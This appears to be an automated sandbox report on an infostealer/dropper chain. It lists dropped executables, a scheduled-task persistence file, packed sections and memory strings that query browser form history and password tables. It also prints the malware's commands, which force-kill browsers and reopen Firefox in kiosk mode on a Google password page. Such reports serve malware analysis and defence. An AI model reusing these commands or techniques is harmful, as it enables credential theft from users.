Source: 90bef5afae.exe, 0000000E.00000000.3036690309.00000000006D2000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_32466ea3-2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: .idata
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .rsrc
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .idata
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name:
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .rsrc
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: 26e226f915.exe.9.dr Static PE information: section name:
Source: 26e226f915.exe.9.dr Static PE information: section name: .rsrc
Source: 26e226f915.exe.9.dr Static PE information: section name: .idata
Source: random[1].exe0.9.dr Static PE information: section name:
Source: random[1].exe0.9.dr Static PE information: section name: .rsrc
Source: random[1].exe0.9.dr Static PE information: section name: .idata
Source: random[1].exe0.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .rsrc
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .idata
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: .idata
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .rsrc
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .idata
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name:
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: .idata
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: .idata
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: num[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B06AB1 0_3_00B06AB1
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1F989 6_2_00C1F989
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1F952 6_2_00C1F952
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1F97E 6_2_00C1F97E
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1FD52 6_2_00C1FD52
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00840228 11_2_00840228
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0086E8A0 11_2_0086E8A0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0087A0D0 11_2_0087A0D0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00842030 11_2_00842030
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083A850 11_2_0083A850
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083E1A0 11_2_0083E1A0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00835160 11_2_00835160
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00874A40 11_2_00874A40
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083A300 11_2_0083A300
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00844487 11_2_00844487
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0084049B 11_2_0084049B
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00837CA4 11_2_00837CA4
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0085CCD0 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0085C470 11_2_0085C470
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00838590 11_2_00838590
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_008335B0 11_2_008335B0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0084C5F0 11_2_0084C5F0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0085FD10 11_2_0085FD10
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083BEB0 11_2_0083BEB0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00846EBF 11_2_00846EBF
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083AF10 11_2_0083AF10
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: String function: 0084D300 appears 47 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00B17BAF appears 90 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9995358910891089
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: skotes.exe.3.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: random[1].exe.9.dr Static PE information: Section: ZLIB complexity 0.9995358910891089
Source: 26e226f915.exe.9.dr Static PE information: Section: ZLIB complexity 0.9995358910891089
Source: random[1].exe0.9.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: ef2532c0b1.exe.9.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2408818591.00000000004A1000.00000040.00000001.01000000.00000009.sdmp, 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000003.2368421842.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3013087261.0000000000041000.00000040.00000001.01000000.00000010.sdmp, ef2532c0b1.exe, 0000000C.00000003.2972676425.00000000052C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@73/30@104/12
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\9GL3FFP2.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT fieldname, value FROM moz_formhistory;s
Source: file.exe, 00000000.00000003.2156705356.0000000005749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156338452.0000000005767000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048188721.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3069889044.0000000005E43000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3154199825.000000000597A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3152191548.0000000005998000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3175476349.0000000005994000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: ST44OD0PMG8MCMYJRN4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ef2532c0b1.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe "C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe "C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe"
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe "C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a09107fa-2b02-4b88-8d3f-d1bbd3ed1ba2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 170f356e110 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4340 -parentBuildID 20230927232528 -prefsHandle 4348 -prefMapHandle 4344 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d7e8a7-213f-46a0-8d10-1ac585e34cc2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 17083a29810 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe "C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe "C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe "C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe "C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe "C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe "C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe "C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe"
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe "C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe "C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe "C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a09107fa-2b02-4b88-8d3f-d1bbd3ed1ba2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 170f356e110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4340 -parentBuildID 20230927232528 -prefsHandle 4348 -prefMapHandle 4344 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d7e8a7-213f-46a0-8d10-1ac585e34cc2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 17083a29810 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
